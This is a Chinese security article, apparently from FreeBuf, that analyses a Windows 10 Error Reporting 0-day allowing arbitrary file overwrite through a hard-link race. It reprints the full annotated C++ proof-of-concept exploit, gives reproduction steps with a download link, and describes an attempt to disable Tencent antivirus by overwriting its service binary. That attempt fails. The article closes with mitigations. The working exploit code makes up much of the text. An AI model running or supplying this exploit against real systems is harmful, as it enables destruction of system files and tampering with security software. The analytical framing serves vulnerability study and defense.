尋夢新聞LINE@每日推播熱門推薦文章,趣聞不漏接❤️
*本文原創作者:markyu,本文屬於FreeBuf原創獎勵計劃,未經許可禁止轉載
漏洞名稱
windows任意文件覆蓋。
漏洞介紹
安全研究員SandboxEscaper披露Windows操作系統中第四個0-day漏洞的漏洞利用代碼,利用該漏洞可以覆蓋任意Windows10文件,包括通常無法訪問的基本文件,例如SandboxEscaper在POC中給出的pci.sys文件,直接造成系統拒絕服務,當然可以用此方法來關閉第三方殺軟,原文如下:
其漏洞發生模塊為WER(Windows error report),WER是一個靈活的基於事件的反饋基礎架構,用戶收集硬件和軟件發生問題時進行異常回收,然後發送給Microsoft,並給用戶提示合適的異常解決方法。
當發生異常時,首先需要使用一系列參數描述該異常,例如應用名字、應用版本、模塊名字、模塊版本、錯誤代碼等,然後根據這個異常描述,WER模塊便通常查詢WER服務器給用戶返回一個異常修復方法,假如WER服務器上存在該描述的異常,則直接返回解決方案然後通過WER顯示給用戶,假如WER服務器上沒有改描述的異常,則返回一個狀態碼,通過WER顯示並詢問用戶是否將當前錯誤發送給微軟用於以後研究。
漏洞本質
Time of Check Versus Time of Use(TOCTOU),原理參考https://www.freebuf.com/vuls/192876.html。
漏洞利用基礎環境
原文中描述該漏洞成功利用限制較多,最少要滿足以下三個要求,但經過測試,其必須連接網路要求可以並不需要,實際限制條件只有下面兩個:
1.系統版本必須為windows10(其他版本win7、win2008、win2012經測試均無法復現利用),
2.非單個CPU(單CPU多內核也是不滿足條件的)
再沒有網路連接的時候,在win10上是可以成功復現的,只是會在C:\ProgramData\Microsoft\Windows\WER\ReportQueue路徑下留下了\1_1_1_1_1\Report.wer文件,即表示該文文件未成功發送給wer服務器:
POC驗證與利用
1.下載https://github.com/SandboxEscaper/randomrepo/blob/master/angrypolarbearbug.rarPOC文件。
2.桌面新建test.txt,隨意輸入內容:
3.確保Report.wer和AngryPolarBearBug.exe在同一目錄,運行POC文件。
4.被覆蓋後的test.txt文件如下:
POC原理分析
任意文件覆蓋利用成功主要在於主程序中runme(自己創建的線程,在該線程中使用硬鏈接方式覆蓋目標文件)與system(使用計劃任務給wer服務器發送異常報告)這兩個線程函數存在時間競爭,關於具體做到過程可參考下面源碼註釋:
#include <iostream>
#include "stdafx.h"
#include <stdio.h>
#include <tchar.h>
#include <Windows.h>
#include <strsafe.h>
const char* targetfile;//定義一個指向需要被覆蓋的文件的指針
bool CreateNativeHardlink(LPCWSTR linkname, LPCWSTR targetname);//CreateNativeHardlink聲明,用於創建一個硬鏈接
std::wstring s2ws(const std::string& str)//將多字節編碼轉換成寬字節編碼
{
int size_needed = MultiByteToWideChar(CP_UTF8, 0, &str[0], (int)str.size(), NULL, 0);//獲取需要的緩沖區大小,類型為int型
std::wstring wstrTo(size_needed, 0);//申請空間時,將緩沖區大小按字符計算
MultiByteToWideChar(CP_UTF8, 0, &str[0], (int)str.size(), &wstrTo[0], size_needed);
return wstrTo;
}
DWORD WINAPI MyThreadFunction(LPVOID lpParam)//定義自己的線程函數
{
LPCWSTR filename1;//LPCWSTR指向unicode編打字符串的32位指針
LPCWSTR root = L"C:\\ProgramData\\Microsoft\\Windows\\WER\\Temp\\";
HANDLE hDir = CreateFile(L"C:\\ProgramData\\Microsoft\\Windows\\WER\\Temp",FILE_LIST_DIRECTORY,FILE_SHARE_WRITE | FILE_SHARE_READ | FILE_SHARE_DELETE,NULL,OPEN_EXISTING,FILE_FLAG_BACKUP_SEMANTICS,NULL);
FILE_NOTIFY_INFORMATION strFileNotifyInfo[1024];//FILE_NOTIFY_INFORMATION定義一個文件通知結構體
DWORD dwBytesReturned = 0;
std::wstring extension = L".xml";
std::string targetf(targetfile);
std::wstring targetfw = s2ws(targetf);
bool blah = false;
const wchar_t* targetfww = targetfw.c_str();//targetfww為最終轉換後的指向需要被覆蓋的文件的指針
while (TRUE)
{
ReadDirectoryChangesW(hDir, (LPVOID)&strFileNotifyInfo, sizeof(strFileNotifyInfo), TRUE, FILE_NOTIFY_CHANGE_FILE_NAME, &dwBytesReturned, NULL, NULL);//監控到hDir指向的目錄下是否有文件發生改變
filename1 = strFileNotifyInfo[0].FileName;//獲取變化的文件名
std::wstring df = std::wstring(root) + filename1;//構造變化的文件的絕對路徑
std::wstring::size_type found = df.find(extension);//判斷該文件後綴是否為xml
if (found != std::wstring::npos)//匹配到了後綴為xml的文件
{
LPCWSTR dfc = df.c_str();//指向該變化文件的絕對路徑
do
{
blah = CreateNativeHardlink(dfc,targetfww);//創建一個硬鏈接,當dfc文件變化時,targetfww文件(需要被覆蓋的文件)也會跟著變化
} while (blah == false);//成功返回1,跳出創建線程的循環
return 0;
}
}
return 0;
}//那麼我們現在只需要創造出一個異常,並保存到C:\\ProgramData\\Microsoft\\Windows\\WER\\Temp目錄下,調用該函數時便會成功執行,即覆蓋我們的目標文件
void runme() { //創建一個線程
HANDLE mThread = CreateThread(NULL, 0, MyThreadFunction, NULL, 0, NULL);//線程安全屬性、堆棧大小、線程函數、線程參數、線程創建屬性、線程ID
}
int main(int argc, const char * argv[])
{
if (argc < 2) { //判斷輸入的參數格式是否正確
std::cout << std::endl << "Please include a filepath as first parameter";
return 0;
}
DWORD dwFileSize = 0;
DWORD dwFileSize2 = 0;
targetfile = argv[1];//指向獲取需要被覆蓋的目標文件絕對路徑
HANDLE hFile = CreateFileA(argv[1], GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);//打開需要被覆蓋的目標文件
if (hFile == INVALID_HANDLE_VALUE)//打開需要被覆蓋的目標文件句柄時發生異常了
{
std::cout << std::endl << "I do not have read permissions for this file or file does not exist";
return 0;
}
dwFileSize = GetFileSize(hFile, NULL);//先獲取需要被覆蓋的目標文件的大小,用於下面判斷該文件是否已經被覆蓋
dwFileSize2 = dwFileSize;
CloseHandle(hFile);//關閉目標文件句柄
std::cout << std::endl
<< "/////////////////////////////////////////////////////////" << std::endl
<< "//抖抖抖抖抖抖抖抖抖抖抖抖抖抖抖抖抖抖抖抖抖抖抖抖抖抖?/" << std::endl
<< "//抖抖抖抖抖抖ЁЁЁЁ抖抖抖抖抖抖抖抖抖抖抖抖抖抖抖抖?/" << std::endl
<< "//抖抖抖抖?``````````````11Ё抖抖抖抖抖抖抖抖抖抖抖抖?/" << std::endl
<< "//抖抖抖1````````````````````````1Ё抖抖抖抖抖抖抖抖抖?/" << std::endl
<< "//抖抖``````````````````````````````Ё抖抖抖抖抖抖抖?/" << std::endl
<< "//抖錠```````````````````````````````````1Ф抖抖抖抖抖?/" << std::endl
<< "//抖``````````````````````````````````````1Ф抖抖抖抖//" << std::endl
<< "//抖``````````BIPOLAR BEAR`````````````````````1Ф抖抖?/" << std::endl
<< "//?`1`````````````````````````````````````````1`1抖抖?/" << std::endl
<< "//錠抖```````````````````````````````````````````1Ф?/" << std::endl
<< "//抖禶Ё```````````````````````````````````````````Ф抖//" << std::endl
<< "//抖1``1```````````````````````111Ё抖抖抖ЁФ抖抖抖?/" << std::endl
<< "//抖````1````````````````````1Ё抖抖抖抖抖抖抖抖抖抖?/" << std::endl
<< "//錠`````````````11`````````Ё``1抖抖抖抖抖抖抖抖抖抖//" << std::endl
<< "//禶`````1抖```````抖抖1`````?````抖抖抖抖抖抖抖抖抖抖//" << std::endl
<< "//禶````Ф抖?`````抖抖```抖1````1抖抖抖抖抖抖抖抖抖?/" << std::endl
<< "//```Ф抖抖禶```1抖抖```抖禶````抖抖抖抖抖抖抖抖抖?/" << std::endl
<< "//禶```Ф抖抖禶```1抖抖```抖抖````1抖抖抖抖抖抖抖抖抖//" << std::endl
<< "//抖111`11抖抖1``````1抖```1Ф?````11抖抖抖抖抖抖抖?/" << std::endl
<< "//抖抖抖抖抖抖抖抖抖抖抖抖抖抖抖抖抖抖抖抖抖抖抖抖抖抖?/" << std::endl
<< "/////////////////////////////////////////////////////////" << std::endl;
std::cout << std::endl << "---------------------------------BIPOLAR BEAR SALUTES YOU------------------------------------------------------------" << std::endl;
Sleep(2000);
do {
CreateDirectoryW(L"c:\\programdata\\microsoft\\windows\\wer\\reportqueue\\1_1_1_1_1", NULL);//再c:\\programdata\\microsoft\\windows\\wer\\reportqueue\\下創建1_1_1_1_1子目錄
CopyFileW(L"Report.wer", L"c:\\programdata\\microsoft\\windows\\wer\\reportqueue\\1_1_1_1_1\\Report.wer", true);//復制當前目錄下Report.wer文件到上面創建子目錄中,即將該Report.wer異常包加入異常報告隊列
runme();//在發送異常報告時,會在C:\\ProgramData\\Microsoft\\Windows\\WER\\Temp,目錄下產出一個臨時文件Report.wer,此時便會被我們自己創建的線程捕獲,在線程中替換了目標文件
system("SCHTASKS /Run /Tn \"Microsoft\\Windows\\Windows Error Reporting\\QueueReporting\"");//通過system函數調用計劃任務運行WER,模擬系統發送給wer服務器發送異常,故該漏洞利用條件之一需要連接網路
HANDLE hFile2 = CreateFileA(argv[1], GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);//重新獲取目標文件句柄
if (hFile2 != INVALID_HANDLE_VALUE)//判斷當前文件大小與上一次的文件大小是否相等,假如相等便成功替換
{
dwFileSize2 = GetFileSize(hFile2, NULL);
}
CloseHandle(hFile2);
} while (dwFileSize == dwFileSize2);
std::cout << std::endl << "---------------------------------DATA IN FILE SUCCESSFULLY DESTROYED - Press key to exit------------------------------";
getchar();//退出主進程
}
針對於作者原文中提到利用該漏洞可能繞過第三方殺軟,我做了如下測試,測試對象為騰訊的電腦管家,嘗試覆蓋電腦管家運行時的關鍵文件以達到關閉殺軟的效果。
首先打開任務管理器找到電腦關鍵的核心服務的QQPCMgr RTP Service ,然後再通過services.msc找到該服務,右擊屬性找到該服務程序的路徑,」C:\Program Files (x86)\Tencent\QQPCMgr\13.0.19838.236\QQPCRTP.exe」 ,那麼我們把該文件覆蓋掉是不是就可以關閉電腦管家,操作如下:
嘗試覆蓋QQPCRTP.exe文件,提示I do not have read permissions for this file or file does not exist,發現我們並不能覆蓋該文件,導致該錯誤是由於,POC中是直接通過CreateFile的方式來獲取目標文件句柄的,由於該文件處於正在運行狀態,導致獲取句柄失敗,即關閉殺軟失敗,無法利用該漏洞去覆蓋正在運行的程序。
漏洞修復
1.經驗證該漏洞只適用於win10系統版本,截至目前,微軟官方並未發布補丁,由於該漏洞環境為本地,不可以遠程觸發,為防止攻擊者對該漏洞進行利用,用戶不要下載與運行來源不明的軟件。
2.通過services.msc臨時關閉Windows Error Reporting Service。
參考
https://github.com/SandboxEscaper/randomrepo/blob/master/angrypolarbearbug.rar
https://docs.microsoft.com/en-us/windows/desktop/wer/about-wer
https://docs.microsoft.com/zh-cn/windows/desktop/FileIO/hard-links-and-junctions
*本文原創作者:markyu,本文屬於FreeBuf原創獎勵計劃,未經許可禁止轉載